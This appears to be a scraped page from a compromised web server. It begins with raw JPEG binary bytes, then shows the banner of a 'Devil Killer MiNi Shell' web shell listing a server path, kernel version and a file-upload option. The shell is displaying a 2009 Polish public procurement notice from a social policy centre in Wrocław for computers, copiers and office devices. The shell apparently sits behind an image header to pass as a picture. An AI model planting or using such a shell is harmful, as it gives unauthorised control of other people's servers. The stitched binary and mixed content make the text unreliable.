JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090422/117282-N-2009.html

<p class="kh_header"><b>Wrocław: Jednorazowa dostawa  5 sztuk fabrycznie nowych stacjonarnych zestawów komputerowych wraz z oprogramowaniem i monitorem LCD   - Zadanie 1, Dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek  - Zadanie 2, Dostawa 4 sztuk fabrycznie nowych komputerów przenośnych (laptopów) - Zadanie 3, Dostawa 6 sztuk fabrycznie nowych  urządzeń wielofunkcyjnych (drukarka, skaner, fax) - Zadanie 4, Dostawa fabrycznie nowych różnych akcesoriów komputerowych - Zadanie 5, Dostawa specjalistycznego oprogramowania komputerowego - Zadanie 6  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej we Wrocławiu.</b><br>
<b>Numer ogłoszenia: 117282 - 2009; data zamieszczenia: 22.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląski Ośrodek Polityki Społecznej , plac Jana Pawła II 8, 50-043 Wrocław, woj. dolnośląskie, tel. 0-71 784 57 53, faks 0-71 784 57 51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dops.wroclaw.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Jednorazowa dostawa  5 sztuk fabrycznie nowych stacjonarnych zestawów komputerowych wraz z oprogramowaniem i monitorem LCD   - Zadanie 1, Dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek  - Zadanie 2, Dostawa 4 sztuk fabrycznie nowych komputerów przenośnych (laptopów) - Zadanie 3, Dostawa 6 sztuk fabrycznie nowych  urządzeń wielofunkcyjnych (drukarka, skaner, fax) - Zadanie 4, Dostawa fabrycznie nowych różnych akcesoriów komputerowych - Zadanie 5, Dostawa specjalistycznego oprogramowania komputerowego - Zadanie 6  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej we Wrocławiu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Jednorazowa dostawa  5 sztuk fabrycznie nowych stacjonarnych zestawów komputerowych wraz z oprogramowaniem i monitorem LCD   - Zadanie 1, Dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek  - Zadanie 2, Dostawa 4 sztuk fabrycznie nowych komputerów przenośnych (laptopów) - Zadanie 3, Dostawa 6 sztuk fabrycznie nowych  urządzeń wielofunkcyjnych (drukarka, skaner, fax) - Zadanie 4, Dostawa fabrycznie nowych różnych akcesoriów komputerowych - Zadanie 5, Dostawa specjalistycznego oprogramowania komputerowego - Zadanie 6  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu przy pl. Jana Pawła II nr 8..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.23.13.00-0, 48.70.00.00-5, 30.12.12.00-5, 30.21.31.00-6, 30.23.21.10-8, 30.23.60.00-2, 30.23.74.10-6, 30.23.74.60-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków.
 O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy wykażą się:
spełnianiem warunków podmiotowych: 
1posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Dla potwierdzenia tego warunku Zamawiający wymaga przedłożenia przez wykonawcę dokumentu określonego w ust. 1 rozdziale VII SIWZ Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem techniczny i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust.1 i ust. 2 ustawy Pzp. 
W przypadku składania oferty wspólnej o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy ponad powyżej wymienione warunki ustanowią pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Oferta, aby była ważna, musi być podpisana przez upoważnionych do zaciągania zobowiązań przedstawicieli Wykonawcy, wymienionych w aktualnych dokumentach rejestracyjnych firmy lub osobę(y), która(e) otrzymała(y) stosowne pełnomocnictwa do podpisania oferty od osób, o których mowa wyżej. W takim przypadku należy dołączyć pełnomocnictwo. Podpisy wyżej wymienionych osób złożone będą na formularzu oferty, oraz na wszystkich załączonych dokumentach. 
Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymogami Zamawiającego określonymi w SIWZ oraz w załącznikach 2a i/lub 2 b i/lub 2c i/lub 2d i/lub 2e i/lub 2f do SIWZ, które szczegółowo określają przedmiot zamówienia oraz wymagania co do sposobu jego realizacji.
Dokumenty przedłożone w formie kserokopii muszą być poświadczone za zgodność z oryginałem, opatrzone imienną pieczątką i własnoręcznym podpisem upoważnionych do zaciągania zobowiązań przedstawicieli Wykonawcy.
Dokonanie oceny spełniania warunków przez wykonawców odbywać się będzie na podstawie przedłożonych przez wykonawcę dokumentów i oświadczeń wymienionych w rozdziale VI SIWZ, zgodnie z formułą spełnia/nie spełnia.
 Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w warunki wykonawca spełnił. 
Zamawiający wzywa wykonawców, którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1 zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia  w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania; Złożone na wezwanie Zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż  w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert.
8.    Niespełnienie warunków podmiotowych skutkować będzie wykluczeniem wykonawcy z postępowania, natomiast niespełnienie warunków przedmiotowych skutkować będzie odrzuceniem oferty. Ponadto ofertę Wykonawcy, który zostanie wykluczony, uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu  określone w  art. 22 ust. 1 pkt 1-4 ustawy Pzp, (Zał. Nr 3 do SIWZ).  
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów o których mowa w ust. 1 i 2 składa dokumenty wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
b)	nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa powyżej zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym lub organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Zamawiający jest uprawniony do żądania od wykonawców załączenia do oferty dokumentów na podstawie Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r., w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawców oraz form, w jakich te dokumenty mogą być składane. (DZ. U. z dnia 24 maja 2006, Nr 87, poz. 605 z póżn. zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dops.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.dops.wroc.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 10:00, miejsce: Oferty należy składać w siedzibie Zamawiającego: Dolnośląski Ośrodek Pomocy Społecznej we Wrocławiu, pl. Jana Pawła II nr 8 (budynek A): Sekretariat (pokój nr 314).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część sprzętu komputerowego i urządzeń jest zakupiona w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 rozwój i upowszechnianie aktywnej integracji. Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia - ZADANIE 1  jest jednorazowa dostawa 5 sztuk fabrycznie nowych zestawów komputerowych stacjonarnych wraz z oprogramowaniem i monitorem LCD (Zadanie 1) - na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8 (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 1  jest jednorazowa dostawa 5 sztuk fabrycznie nowych zestawów komputerowych stacjonarnych wraz z oprogramowaniem i monitorem (Zadanie 1) - na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8 (budynek A).
Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiący załącznik nr 2a do SIWZ.
Wykonawca udzieli 36 miesięcznej gwarancji na zestawy komputerowe i monitory LCD, która rozpoczyna swój bieg od dnia dostarczenia towarów do Dolnośląskiego Ośrodka Polityki Społecznej. Dostarczenie towarów będzie potwierdzone protokołem odbioru.
Wykonawca zobowiązuje się do przedłużenia okresu gwarancji o pełen okres niesprawności dostarczanego sprzętu.
W przypadku awarii sprzętu Wykonawca zobowiązuje się do usunięcia usterki w terminie max. 14 dni roboczych od daty przyjęcia zgłoszenia.
Jeżeli uszkodzenie nie zostanie usunięte w terminie 14 dni roboczych od dnia przyjęcia zgłoszenia Wykonawca zapewni urządzenie zastępcze na czas naprawy.
W przypadku 3 krotnej naprawy gwarancyjnej tego samego elementu lub podzespołu Wykonawca jest zobowiązany wymienić ten element (podzespół) lub przedmiot umowy na nowy w ciągu 14 dni roboczych do dnia stwierdzenia wady przedmiotu umowy.
Wykonawca jest zobowiązany udzielić 24 miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części.
Wymagany serwis od poniedziałku do piątku  (dni robocze) w godz. 8:00 - 16:00.
Wszelkie koszty związane ze świadczeniem usług gwarancyjnych obciążają Wykonawcę.
Wszystkie elementy zestawu winny być w tym samym kolorze.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Zamawiający wymaga aby:
- komputery były przystosowane do zasilania z sieci energetycznej o napięciu nominalnym 230 V 50 Hz;
-  posiadał napędy optyczne podłączone do innego kanału niż dyski stałe;
- producent monitorów posiadał w kraju autoryzowany serwis gwarancyjny i pogwarancyjny.
 Wykonawca zobowiązuje się zapewnić serwis gwarancyjny i pogwarancyjny dla dostarczonych towarów.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu kart gwarancyjnych do każdego z dostarczonych sprzętów.
Zamawiający wymaga aby dostarczony sprzęt był fabrycznie nowy, wyprodukowany w 2009 r.
Zamawiający wymaga aby dostarczony sprzęt posiadał autoryzację producenta sprzętu dla firmy serwisującej.
Zamawiający zastrzega sobie prawo do niewykorzystania całości zamówienia.
Dwa zestawy komputerowe wraz z oprogramowaniem i monitorem są  zakupione w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowanego  z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.33.00-8, 30.23.13.00-0, 48.70.00.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest jednorazowa dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek (Zadanie 2)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8 (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 2 jest jednorazowa dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek.
 Przedmiotem zamówienia jest jednorazowa dostawa i montaż 2 sztuk fabrycznie nowych kserokopiarek (Zadanie 2)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8 (budynek A).
Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiącej załącznik nr 2b do SIWZ.
Wykonawca udzieli nie krótszej niż 24 miesięcznej gwarancji na zakupiony sprzęt, która rozpoczyna swój bieg od dnia dostarczenia towarów do Dolnośląskiego Ośrodka Polityki Społecznej. Dostarczenie towarów będzie potwierdzone protokołem odbioru.
Wykonawca zobowiązuje się do przedłużenia okresu gwarancji o pełen okres niesprawności dostarczanego sprzętu.
W przypadku awarii sprzętu Wykonawca zobowiązuje się do usunięcia usterki w terminie max. 14 dni roboczych od daty przyjęcia zgłoszenia.
Jeżeli uszkodzenie nie zostanie usunięte w terminie 14 dni roboczych od dnia przyjęcia zgłoszenia Wykonawca zapewni urządzenie zastępcze na czas naprawy.
W przypadku 3 krotnej naprawy gwarancyjnej tego samego elementu lub podzespołu Wykonawca jest zobowiązany wymienić ten element (podzespół) lub przedmiot umowy na nowy w ciągu 14 dni roboczych do dnia stwierdzenia wady przedmiotu umowy.
Wykonawca jest zobowiązany udzielić 24 miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części.
Wymagany serwis od poniedziałku do piątku  (dni robocze) w godz. 8:00 - 16:00.
Wszelkie koszty związane ze świadczeniem usług gwarancyjnych obciążają Wykonawcę.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Wykonawca dokona montażu dostarczonego sprzętu w miejscu wskazanym przez Zamawiającego oraz udzieli 12 miesięcznej gwarancji na wykonane prace montażowe.
Wykonawca zobowiązuje się do przeszkolenia pracowników Dolnośląskiego Ośrodka Pomocy Społecznej , w zakresie obsługi dostarczanego sprzętu.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu kart gwarancyjnych do każdego z dostarczonych urządzeń.  
Zamawiający wymaga aby dostarczony sprzęt był fabrycznie nowy, wyprodukowany w 2009 r.
Zamawiający wymaga aby dostarczony sprzęt posiadał autoryzację producenta sprzętu dla firmy serwisującej. Zamawiający zastrzega sobie prawo do nie wykorzystania całości zamówienia.
Jedna sztuka kserokopiarki jest zakupiona w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowana z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.12.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest jednorazowa dostawa 4 sztuk fabrycznie nowych komputerów przenośnych  (Zadanie 3)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 3 jest jednorazowa dostawa 4 sztuk fabrycznie nowych komputerów przenośnych (laptopów).
 Przedmiotem zamówienia jest jednorazowa dostawa 4 sztuk fabrycznie nowych komputerów przenośnych  (Zadanie 3)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A).
Szczegółowe określenie przedmiotu zamówienia zawiera formularz kalkulacji cenowej stanowiącej załącznik nr 2c do SIWZ.
Wykonawca udzieli nie krótszej niż 24 miesięcznej gwarancji na zakupiony sprzęt, która rozpoczyna swój bieg od dnia dostarczenia towarów do Dolnośląskiego Ośrodka Polityki Społecznej. Dostarczenie towarów będzie potwierdzone protokołem odbioru.
Wykonawca zobowiązuje się do przedłużenia okresu gwarancji o pełen okres niesprawności dostarczanego sprzętu.
W przypadku awarii sprzętu Wykonawca zobowiązuje się do usunięcia usterki w terminie max. 14 dni roboczych od daty przyjęcia zgłoszenia.
Jeżeli uszkodzenie nie zostanie usunięte w terminie 14 dni roboczych od dnia przyjęcia zgłoszenia Wykonawca zapewni urządzenie zastępcze na czas naprawy.
W przypadku 3 krotnej naprawy gwarancyjnej tego samego elementu lub podzespołu Wykonawca jest zobowiązany wymienić ten element (podzespół) lub przedmiot umowy na nowy w ciągu 14 dni roboczych do dnia stwierdzenia wady przedmiotu umowy.
Wykonawca jest zobowiązany udzielić 24 miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części.
Wymagany serwis od poniedziałku do piątku  (dni robocze) w godz. 8:00 - 16:00.
Wszelkie koszty związane ze świadczeniem usług gwarancyjnych obciążają Wykonawcę.
Wykonawca dostarczy przedmiot zamówienia w jednorazowej dostawie do Dolnośląskiego Ośrodka Pomocy Społecznej we Wrocławiu z siedzibą przy pl. Jana Pawła II nr 8.
Wykonawca zobowiązuje się do dostarczenia Zamawiającemu kart gwarancyjnych do każdego z dostarczonych urządzeń.  
Zamawiający zastrzega sobie prawo do niewykorzystania całości zamówienia.
Zamawiający wymaga aby dostarczony sprzęt był fabrycznie nowy, wyprodukowany w 2009 r.
Zamawiający wymaga aby dostarczony sprzęt posiadał autoryzację producenta sprzętu dla firmy serwisującej.
Trzy sztuki fabrycznie nowych komputerów przenośnych zostały zakupione w ramach Projektu systemowego DOPS w zakresie podnoszenia kwalifikacji kadr pomocy i integracji społecznej, współfinansowana z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.3 Podnoszenie kwalifikacji kadr pomocy i integracji społecznej..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest jednorazowa dostawa 6  sztuk fabrycznie nowych urządzeń wielofunkcyjnych (Zadanie 4)  na potrzeby Dolnośląskiego Ośrodka Polityki Społecznej z siedzibą we Wrocławiu, przy pl. Jana Pawła II nr 8  (budynek A)..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia - ZADANIE 4 jest jednorazowa dostawa 6 sztuk fabrycznie nowych urządzeń wielofunkcyjnych (drukarka, skaner, fax).
